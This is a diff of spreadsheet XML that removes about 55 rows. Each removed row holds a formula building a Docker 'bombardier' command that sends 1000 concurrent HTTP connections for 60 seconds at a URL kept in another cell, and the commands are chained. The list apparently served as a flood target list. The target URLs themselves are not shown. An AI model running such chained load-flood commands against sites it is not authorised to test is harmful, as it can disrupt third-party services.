-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B13&amp;"&amp;&amp; sleep 5;"</f>
-        <v>27</v>
-      </c>
-      <c r="B13" t="s" s="2">
-        <v>28</v>
-      </c>
-      <c r="C13" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A13" s="2"/>
+      <c r="B13" s="2"/>
+      <c r="C13" s="2"/>
       <c r="D13" s="3"/>
       <c r="E13" s="3"/>
     </row>
     <row r="14" ht="15.35" customHeight="1">
-      <c r="A14" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B14&amp;"&amp;&amp; sleep 5;"</f>
-        <v>29</v>
-      </c>
-      <c r="B14" t="s" s="2">
-        <v>30</v>
-      </c>
-      <c r="C14" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A14" s="2"/>
+      <c r="B14" s="2"/>
+      <c r="C14" s="2"/>
       <c r="D14" s="3"/>
       <c r="E14" s="3"/>
     </row>
     <row r="15" ht="15.35" customHeight="1">
-      <c r="A15" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B15&amp;"&amp;&amp; sleep 5;"</f>
-        <v>31</v>
-      </c>
-      <c r="B15" t="s" s="2">
-        <v>32</v>
-      </c>
-      <c r="C15" t="s" s="2">
-        <v>33</v>
-      </c>
+      <c r="A15" s="2"/>
+      <c r="B15" s="2"/>
+      <c r="C15" s="2"/>
       <c r="D15" s="3"/>
       <c r="E15" s="3"/>
     </row>
     <row r="16" ht="15.35" customHeight="1">
-      <c r="A16" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B16&amp;"&amp;&amp; sleep 5;"</f>
-        <v>34</v>
-      </c>
-      <c r="B16" t="s" s="2">
-        <v>35</v>
-      </c>
-      <c r="C16" t="s" s="2">
-        <v>33</v>
-      </c>
+      <c r="A16" s="2"/>
+      <c r="B16" s="2"/>
+      <c r="C16" s="2"/>
       <c r="D16" s="3"/>
       <c r="E16" s="3"/>
     </row>
     <row r="17" ht="15.35" customHeight="1">
-      <c r="A17" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B17&amp;"&amp;&amp; sleep 5;"</f>
-        <v>36</v>
-      </c>
-      <c r="B17" t="s" s="2">
-        <v>37</v>
-      </c>
-      <c r="C17" t="s" s="2">
-        <v>33</v>
-      </c>
+      <c r="A17" s="2"/>
+      <c r="B17" s="2"/>
+      <c r="C17" s="2"/>
       <c r="D17" s="3"/>
       <c r="E17" s="3"/>
     </row>
     <row r="18" ht="15.35" customHeight="1">
-      <c r="A18" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B18&amp;"&amp;&amp; sleep 5;"</f>
-        <v>38</v>
-      </c>
-      <c r="B18" t="s" s="2">
-        <v>39</v>
-      </c>
-      <c r="C18" t="s" s="2">
-        <v>33</v>
-      </c>
+      <c r="A18" s="2"/>
+      <c r="B18" s="2"/>
+      <c r="C18" s="2"/>
       <c r="D18" s="3"/>
       <c r="E18" s="3"/>
     </row>
     <row r="19" ht="15.35" customHeight="1">
-      <c r="A19" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B19&amp;"&amp;&amp; sleep 5;"</f>
-        <v>40</v>
-      </c>
-      <c r="B19" t="s" s="2">
-        <v>41</v>
-      </c>
-      <c r="C19" t="s" s="2">
-        <v>33</v>
-      </c>
+      <c r="A19" s="2"/>
+      <c r="B19" s="2"/>
+      <c r="C19" s="2"/>
       <c r="D19" s="3"/>
       <c r="E19" s="3"/>
     </row>
     <row r="20" ht="15.35" customHeight="1">
-      <c r="A20" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B20&amp;"&amp;&amp; sleep 5;"</f>
-        <v>42</v>
-      </c>
-      <c r="B20" t="s" s="2">
-        <v>43</v>
-      </c>
-      <c r="C20" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A20" s="2"/>
+      <c r="B20" s="2"/>
+      <c r="C20" s="2"/>
       <c r="D20" s="3"/>
       <c r="E20" s="3"/>
     </row>
     <row r="21" ht="15.35" customHeight="1">
-      <c r="A21" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B21&amp;"&amp;&amp; sleep 5;"</f>
-        <v>45</v>
-      </c>
-      <c r="B21" t="s" s="2">
-        <v>46</v>
-      </c>
-      <c r="C21" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A21" s="2"/>
+      <c r="B21" s="2"/>
+      <c r="C21" s="2"/>
       <c r="D21" s="3"/>
       <c r="E21" s="3"/>
     </row>
     <row r="22" ht="15.35" customHeight="1">
-      <c r="A22" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B22&amp;"&amp;&amp; sleep 5;"</f>
-        <v>47</v>
-      </c>
-      <c r="B22" t="s" s="2">
-        <v>48</v>
-      </c>
-      <c r="C22" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A22" s="2"/>
+      <c r="B22" s="2"/>
+      <c r="C22" s="2"/>
       <c r="D22" s="3"/>
       <c r="E22" s="3"/>
     </row>
     <row r="23" ht="15.35" customHeight="1">
-      <c r="A23" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B23&amp;"&amp;&amp; sleep 5;"</f>
-        <v>49</v>
-      </c>
-      <c r="B23" t="s" s="2">
-        <v>50</v>
-      </c>
-      <c r="C23" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A23" s="2"/>
+      <c r="B23" s="2"/>
+      <c r="C23" s="2"/>
       <c r="D23" s="3"/>
       <c r="E23" s="3"/>
     </row>
     <row r="24" ht="15.35" customHeight="1">
-      <c r="A24" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B24&amp;"&amp;&amp; sleep 5;"</f>
-        <v>51</v>
-      </c>
-      <c r="B24" t="s" s="2">
-        <v>52</v>
-      </c>
-      <c r="C24" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A24" s="2"/>
+      <c r="B24" s="2"/>
+      <c r="C24" s="2"/>
       <c r="D24" s="3"/>
       <c r="E24" s="3"/>
     </row>
     <row r="25" ht="15.35" customHeight="1">
-      <c r="A25" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B25&amp;"&amp;&amp; sleep 5;"</f>
-        <v>53</v>
-      </c>
-      <c r="B25" t="s" s="2">
-        <v>54</v>
-      </c>
-      <c r="C25" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A25" s="2"/>
+      <c r="B25" s="2"/>
+      <c r="C25" s="2"/>
       <c r="D25" s="3"/>
       <c r="E25" s="3"/>
     </row>
     <row r="26" ht="15.35" customHeight="1">
-      <c r="A26" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B26&amp;"&amp;&amp; sleep 5;"</f>
-        <v>55</v>
-      </c>
-      <c r="B26" t="s" s="2">
-        <v>56</v>
-      </c>
-      <c r="C26" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A26" s="2"/>
+      <c r="B26" s="2"/>
+      <c r="C26" s="2"/>
       <c r="D26" s="3"/>
       <c r="E26" s="3"/>
     </row>
     <row r="27" ht="15.35" customHeight="1">
-      <c r="A27" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B27&amp;"&amp;&amp; sleep 5;"</f>
-        <v>57</v>
-      </c>
-      <c r="B27" t="s" s="2">
-        <v>58</v>
-      </c>
-      <c r="C27" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A27" s="2"/>
+      <c r="B27" s="2"/>
+      <c r="C27" s="2"/>
       <c r="D27" s="3"/>
       <c r="E27" s="3"/>
     </row>
     <row r="28" ht="15.35" customHeight="1">
-      <c r="A28" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B28&amp;"&amp;&amp; sleep 5;"</f>
-        <v>59</v>
-      </c>
-      <c r="B28" t="s" s="2">
-        <v>60</v>
-      </c>
-      <c r="C28" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A28" s="2"/>
+      <c r="B28" s="2"/>
+      <c r="C28" s="2"/>
       <c r="D28" s="3"/>
       <c r="E28" s="3"/>
     </row>
     <row r="29" ht="15.35" customHeight="1">
-      <c r="A29" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B29&amp;"&amp;&amp; sleep 5;"</f>
-        <v>61</v>
-      </c>
-      <c r="B29" t="s" s="2">
-        <v>62</v>
-      </c>
-      <c r="C29" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A29" s="2"/>
+      <c r="B29" s="2"/>
+      <c r="C29" s="2"/>
       <c r="D29" s="3"/>
       <c r="E29" s="3"/>
     </row>
     <row r="30" ht="15.35" customHeight="1">
-      <c r="A30" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B30&amp;"&amp;&amp; sleep 5;"</f>
-        <v>63</v>
-      </c>
-      <c r="B30" t="s" s="2">
-        <v>64</v>
-      </c>
-      <c r="C30" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A30" s="2"/>
+      <c r="B30" s="2"/>
+      <c r="C30" s="2"/>
       <c r="D30" s="3"/>
       <c r="E30" s="3"/>
     </row>
     <row r="31" ht="15.35" customHeight="1">
-      <c r="A31" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B31&amp;"&amp;&amp; sleep 5;"</f>
-        <v>65</v>
-      </c>
-      <c r="B31" t="s" s="2">
-        <v>66</v>
-      </c>
-      <c r="C31" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A31" s="2"/>
+      <c r="B31" s="2"/>
+      <c r="C31" s="2"/>
       <c r="D31" s="3"/>
       <c r="E31" s="3"/>
     </row>
     <row r="32" ht="15.35" customHeight="1">
-      <c r="A32" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B32&amp;"&amp;&amp; sleep 5;"</f>
-        <v>67</v>
-      </c>
-      <c r="B32" t="s" s="2">
-        <v>68</v>
-      </c>
-      <c r="C32" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A32" s="2"/>
+      <c r="B32" s="2"/>
+      <c r="C32" s="2"/>
       <c r="D32" s="3"/>
       <c r="E32" s="3"/>
     </row>
     <row r="33" ht="15.35" customHeight="1">
-      <c r="A33" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B33&amp;"&amp;&amp; sleep 5;"</f>
-        <v>69</v>
-      </c>
-      <c r="B33" t="s" s="2">
-        <v>70</v>
-      </c>
-      <c r="C33" t="s" s="2">
-        <v>44</v>
-      </c>
+      <c r="A33" s="2"/>
+      <c r="B33" s="2"/>
+      <c r="C33" s="2"/>
       <c r="D33" s="3"/>
       <c r="E33" s="3"/>
     </row>
     <row r="34" ht="15.35" customHeight="1">
-      <c r="A34" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B34&amp;"&amp;&amp; sleep 5;"</f>
-        <v>71</v>
-      </c>
-      <c r="B34" t="s" s="2">
-        <v>72</v>
-      </c>
-      <c r="C34" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A34" s="2"/>
+      <c r="B34" s="2"/>
+      <c r="C34" s="2"/>
       <c r="D34" s="3"/>
       <c r="E34" s="3"/>
     </row>
     <row r="35" ht="15.35" customHeight="1">
-      <c r="A35" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B35&amp;"&amp;&amp; sleep 5;"</f>
-        <v>74</v>
-      </c>
-      <c r="B35" t="s" s="2">
-        <v>75</v>
-      </c>
-      <c r="C35" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A35" s="2"/>
+      <c r="B35" s="2"/>
+      <c r="C35" s="2"/>
       <c r="D35" s="3"/>
       <c r="E35" s="3"/>
     </row>
     <row r="36" ht="15.35" customHeight="1">
-      <c r="A36" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B36&amp;"&amp;&amp; sleep 5;"</f>
-        <v>76</v>
-      </c>
-      <c r="B36" t="s" s="2">
-        <v>77</v>
-      </c>
-      <c r="C36" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A36" s="2"/>
+      <c r="B36" s="2"/>
+      <c r="C36" s="2"/>
       <c r="D36" s="3"/>
       <c r="E36" s="3"/>
     </row>
     <row r="37" ht="15.35" customHeight="1">
-      <c r="A37" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B37&amp;"&amp;&amp; sleep 5;"</f>
-        <v>78</v>
-      </c>
-      <c r="B37" t="s" s="2">
-        <v>79</v>
-      </c>
-      <c r="C37" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A37" s="2"/>
+      <c r="B37" s="2"/>
+      <c r="C37" s="2"/>
       <c r="D37" s="3"/>
       <c r="E37" s="3"/>
     </row>
     <row r="38" ht="15.35" customHeight="1">
-      <c r="A38" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B38&amp;"&amp;&amp; sleep 5;"</f>
-        <v>80</v>
-      </c>
-      <c r="B38" t="s" s="2">
-        <v>81</v>
-      </c>
-      <c r="C38" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A38" s="2"/>
+      <c r="B38" s="2"/>
+      <c r="C38" s="2"/>
       <c r="D38" s="3"/>
       <c r="E38" s="3"/>
     </row>
     <row r="39" ht="15.35" customHeight="1">
-      <c r="A39" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B39&amp;"&amp;&amp; sleep 5;"</f>
-        <v>82</v>
-      </c>
-      <c r="B39" t="s" s="2">
-        <v>83</v>
-      </c>
-      <c r="C39" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A39" s="2"/>
+      <c r="B39" s="2"/>
+      <c r="C39" s="2"/>
       <c r="D39" s="3"/>
       <c r="E39" s="3"/>
     </row>
     <row r="40" ht="15.35" customHeight="1">
-      <c r="A40" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B40&amp;"&amp;&amp; sleep 5;"</f>
-        <v>84</v>
-      </c>
-      <c r="B40" t="s" s="2">
-        <v>85</v>
-      </c>
-      <c r="C40" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A40" s="2"/>
+      <c r="B40" s="2"/>
+      <c r="C40" s="2"/>
       <c r="D40" s="3"/>
       <c r="E40" s="3"/>
     </row>
     <row r="41" ht="15.35" customHeight="1">
-      <c r="A41" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B41&amp;"&amp;&amp; sleep 5;"</f>
-        <v>86</v>
-      </c>
-      <c r="B41" t="s" s="2">
-        <v>87</v>
-      </c>
-      <c r="C41" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A41" s="2"/>
+      <c r="B41" s="2"/>
+      <c r="C41" s="2"/>
       <c r="D41" s="3"/>
       <c r="E41" s="3"/>
     </row>
     <row r="42" ht="15.35" customHeight="1">
-      <c r="A42" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B42&amp;"&amp;&amp; sleep 5;"</f>
-        <v>88</v>
-      </c>
-      <c r="B42" t="s" s="2">
-        <v>89</v>
-      </c>
-      <c r="C42" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A42" s="2"/>
+      <c r="B42" s="2"/>
+      <c r="C42" s="2"/>
       <c r="D42" s="3"/>
       <c r="E42" s="3"/>
     </row>
     <row r="43" ht="15.35" customHeight="1">
-      <c r="A43" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B43&amp;"&amp;&amp; sleep 5;"</f>
-        <v>90</v>
-      </c>
-      <c r="B43" t="s" s="2">
-        <v>91</v>
-      </c>
-      <c r="C43" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A43" s="2"/>
+      <c r="B43" s="2"/>
+      <c r="C43" s="2"/>
       <c r="D43" s="3"/>
       <c r="E43" s="3"/>
     </row>
     <row r="44" ht="15.35" customHeight="1">
-      <c r="A44" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B44&amp;"&amp;&amp; sleep 5;"</f>
-        <v>92</v>
-      </c>
-      <c r="B44" t="s" s="2">
-        <v>93</v>
-      </c>
-      <c r="C44" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A44" s="2"/>
+      <c r="B44" s="2"/>
+      <c r="C44" s="2"/>
       <c r="D44" s="3"/>
       <c r="E44" s="3"/>
     </row>
     <row r="45" ht="15.35" customHeight="1">
-      <c r="A45" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B45&amp;"&amp;&amp; sleep 5;"</f>
-        <v>94</v>
-      </c>
-      <c r="B45" t="s" s="2">
-        <v>95</v>
-      </c>
-      <c r="C45" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A45" s="2"/>
+      <c r="B45" s="2"/>
+      <c r="C45" s="2"/>
       <c r="D45" s="3"/>
       <c r="E45" s="3"/>
     </row>
     <row r="46" ht="15.35" customHeight="1">
-      <c r="A46" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B46&amp;"&amp;&amp; sleep 5;"</f>
-        <v>96</v>
-      </c>
-      <c r="B46" t="s" s="2">
-        <v>97</v>
-      </c>
-      <c r="C46" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A46" s="2"/>
+      <c r="B46" s="2"/>
+      <c r="C46" s="2"/>
       <c r="D46" s="3"/>
       <c r="E46" s="3"/>
     </row>
     <row r="47" ht="15.35" customHeight="1">
-      <c r="A47" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B47&amp;"&amp;&amp; sleep 5;"</f>
-        <v>98</v>
-      </c>
-      <c r="B47" t="s" s="2">
-        <v>99</v>
-      </c>
-      <c r="C47" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A47" s="2"/>
+      <c r="B47" s="2"/>
+      <c r="C47" s="2"/>
       <c r="D47" s="3"/>
       <c r="E47" s="3"/>
     </row>
     <row r="48" ht="15.35" customHeight="1">
-      <c r="A48" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B48&amp;"&amp;&amp; sleep 5;"</f>
-        <v>100</v>
-      </c>
-      <c r="B48" t="s" s="2">
-        <v>101</v>
-      </c>
-      <c r="C48" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A48" s="2"/>
+      <c r="B48" s="2"/>
+      <c r="C48" s="2"/>
       <c r="D48" s="3"/>
       <c r="E48" s="3"/>
     </row>
     <row r="49" ht="15.35" customHeight="1">
-      <c r="A49" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B49&amp;"&amp;&amp; sleep 5;"</f>
-        <v>102</v>
-      </c>
-      <c r="B49" t="s" s="2">
-        <v>103</v>
-      </c>
-      <c r="C49" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A49" s="2"/>
+      <c r="B49" s="2"/>
+      <c r="C49" s="2"/>
       <c r="D49" s="3"/>
       <c r="E49" s="3"/>
     </row>
     <row r="50" ht="15.35" customHeight="1">
-      <c r="A50" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B50&amp;"&amp;&amp; sleep 5;"</f>
-        <v>104</v>
-      </c>
-      <c r="B50" t="s" s="2">
-        <v>105</v>
-      </c>
-      <c r="C50" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A50" s="2"/>
+      <c r="B50" s="2"/>
+      <c r="C50" s="2"/>
       <c r="D50" s="3"/>
       <c r="E50" s="3"/>
     </row>
     <row r="51" ht="15.35" customHeight="1">
-      <c r="A51" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B51&amp;"&amp;&amp; sleep 5;"</f>
-        <v>106</v>
-      </c>
-      <c r="B51" t="s" s="2">
-        <v>107</v>
-      </c>
-      <c r="C51" t="s" s="2">
-        <v>73</v>
-      </c>
+      <c r="A51" s="2"/>
+      <c r="B51" s="2"/>
+      <c r="C51" s="2"/>
       <c r="D51" s="3"/>
       <c r="E51" s="3"/>
     </row>
     <row r="52" ht="15.35" customHeight="1">
-      <c r="A52" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B52&amp;"&amp;&amp; sleep 5;"</f>
-        <v>108</v>
-      </c>
-      <c r="B52" t="s" s="2">
-        <v>109</v>
-      </c>
-      <c r="C52" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A52" s="2"/>
+      <c r="B52" s="2"/>
+      <c r="C52" s="2"/>
       <c r="D52" s="3"/>
       <c r="E52" s="3"/>
     </row>
     <row r="53" ht="15.35" customHeight="1">
-      <c r="A53" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B53&amp;"&amp;&amp; sleep 5;"</f>
-        <v>110</v>
-      </c>
-      <c r="B53" t="s" s="2">
-        <v>111</v>
-      </c>
-      <c r="C53" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A53" s="2"/>
+      <c r="B53" s="2"/>
+      <c r="C53" s="2"/>
       <c r="D53" s="3"/>
       <c r="E53" s="3"/>
     </row>
     <row r="54" ht="15.35" customHeight="1">
-      <c r="A54" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B54&amp;"&amp;&amp; sleep 5;"</f>
-        <v>112</v>
-      </c>
-      <c r="B54" t="s" s="2">
-        <v>113</v>
-      </c>
-      <c r="C54" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A54" s="2"/>
+      <c r="B54" s="2"/>
+      <c r="C54" s="2"/>
       <c r="D54" s="3"/>
       <c r="E54" s="3"/>
     </row>
     <row r="55" ht="15.35" customHeight="1">
-      <c r="A55" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B55&amp;"&amp;&amp; sleep 5;"</f>
-        <v>114</v>
-      </c>
-      <c r="B55" t="s" s="2">
-        <v>115</v>
-      </c>
-      <c r="C55" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A55" s="2"/>
+      <c r="B55" s="2"/>
+      <c r="C55" s="2"/>
       <c r="D55" s="3"/>
       <c r="E55" s="3"/>
     </row>
     <row r="56" ht="15.35" customHeight="1">
-      <c r="A56" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B56&amp;"&amp;&amp; sleep 5;"</f>
-        <v>116</v>
-      </c>
-      <c r="B56" t="s" s="2">
-        <v>117</v>
-      </c>
-      <c r="C56" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A56" s="2"/>
+      <c r="B56" s="2"/>
+      <c r="C56" s="2"/>
       <c r="D56" s="3"/>
       <c r="E56" s="3"/>
     </row>
     <row r="57" ht="15.35" customHeight="1">
-      <c r="A57" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B57&amp;"&amp;&amp; sleep 5;"</f>
-        <v>92</v>
-      </c>
-      <c r="B57" t="s" s="2">
-        <v>93</v>
-      </c>
-      <c r="C57" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A57" s="2"/>
+      <c r="B57" s="2"/>
+      <c r="C57" s="2"/>
       <c r="D57" s="3"/>
       <c r="E57" s="3"/>
     </row>
     <row r="58" ht="15.35" customHeight="1">
-      <c r="A58" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B58&amp;"&amp;&amp; sleep 5;"</f>
-        <v>84</v>
-      </c>
-      <c r="B58" t="s" s="2">
-        <v>85</v>
-      </c>
-      <c r="C58" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A58" s="2"/>
+      <c r="B58" s="2"/>
+      <c r="C58" s="2"/>
       <c r="D58" s="3"/>
       <c r="E58" s="3"/>
     </row>
     <row r="59" ht="15.35" customHeight="1">
-      <c r="A59" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B59&amp;"&amp;&amp; sleep 5;"</f>
-        <v>118</v>
-      </c>
-      <c r="B59" t="s" s="2">
-        <v>119</v>
-      </c>
-      <c r="C59" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A59" s="2"/>
+      <c r="B59" s="2"/>
+      <c r="C59" s="2"/>
       <c r="D59" s="3"/>
       <c r="E59" s="3"/>
     </row>
     <row r="60" ht="15.35" customHeight="1">
-      <c r="A60" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B60&amp;"&amp;&amp; sleep 5;"</f>
-        <v>120</v>
-      </c>
-      <c r="B60" t="s" s="2">
-        <v>121</v>
-      </c>
-      <c r="C60" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A60" s="2"/>
+      <c r="B60" s="2"/>
+      <c r="C60" s="2"/>
       <c r="D60" s="3"/>
       <c r="E60" s="3"/>
     </row>
     <row r="61" ht="15.35" customHeight="1">
-      <c r="A61" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B61&amp;"&amp;&amp; sleep 5;"</f>
-        <v>122</v>
-      </c>
-      <c r="B61" t="s" s="2">
-        <v>123</v>
-      </c>
-      <c r="C61" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A61" s="2"/>
+      <c r="B61" s="2"/>
+      <c r="C61" s="2"/>
       <c r="D61" s="3"/>
       <c r="E61" s="3"/>
     </row>
     <row r="62" ht="15.35" customHeight="1">
-      <c r="A62" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B62&amp;"&amp;&amp; sleep 5;"</f>
-        <v>124</v>
-      </c>
-      <c r="B62" t="s" s="2">
-        <v>125</v>
-      </c>
-      <c r="C62" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A62" s="2"/>
+      <c r="B62" s="2"/>
+      <c r="C62" s="2"/>
       <c r="D62" s="3"/>
       <c r="E62" s="3"/>
     </row>
     <row r="63" ht="15.35" customHeight="1">
-      <c r="A63" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B63&amp;"&amp;&amp; sleep 5;"</f>
-        <v>126</v>
-      </c>
-      <c r="B63" t="s" s="2">
-        <v>127</v>
-      </c>
-      <c r="C63" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A63" s="2"/>
+      <c r="B63" s="2"/>
+      <c r="C63" s="2"/>
       <c r="D63" s="3"/>
       <c r="E63" s="3"/>
     </row>
     <row r="64" ht="15.35" customHeight="1">
-      <c r="A64" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B64&amp;"&amp;&amp; sleep 5;"</f>
-        <v>128</v>
-      </c>
-      <c r="B64" t="s" s="2">
-        <v>129</v>
-      </c>
-      <c r="C64" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A64" s="2"/>
+      <c r="B64" s="2"/>
+      <c r="C64" s="2"/>
       <c r="D64" s="3"/>
       <c r="E64" s="3"/>
     </row>
     <row r="65" ht="15.35" customHeight="1">
-      <c r="A65" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B65&amp;"&amp;&amp; sleep 5;"</f>
-        <v>130</v>
-      </c>
-      <c r="B65" t="s" s="2">
-        <v>131</v>
-      </c>
-      <c r="C65" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A65" s="2"/>
+      <c r="B65" s="2"/>
+      <c r="C65" s="2"/>
       <c r="D65" s="3"/>
       <c r="E65" s="3"/>
     </row>
     <row r="66" ht="15.35" customHeight="1">
-      <c r="A66" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B66&amp;"&amp;&amp; sleep 5;"</f>
-        <v>132</v>
-      </c>
-      <c r="B66" t="s" s="2">
-        <v>133</v>
-      </c>
-      <c r="C66" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A66" s="2"/>
+      <c r="B66" s="2"/>
+      <c r="C66" s="2"/>
       <c r="D66" s="3"/>
       <c r="E66" s="3"/>
     </row>
     <row r="67" ht="15.35" customHeight="1">
-      <c r="A67" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B67&amp;"&amp;&amp; sleep 5;"</f>
-        <v>134</v>
-      </c>
-      <c r="B67" t="s" s="2">
-        <v>135</v>
-      </c>
-      <c r="C67" t="s" s="2">
-        <v>12</v>
-      </c>
+      <c r="A67" s="2"/>
+      <c r="B67" s="2"/>
+      <c r="C67" s="2"/>
       <c r="D67" s="3"/>
       <c r="E67" s="3"/>
     </row>
     <row r="68" ht="15.35" customHeight="1">
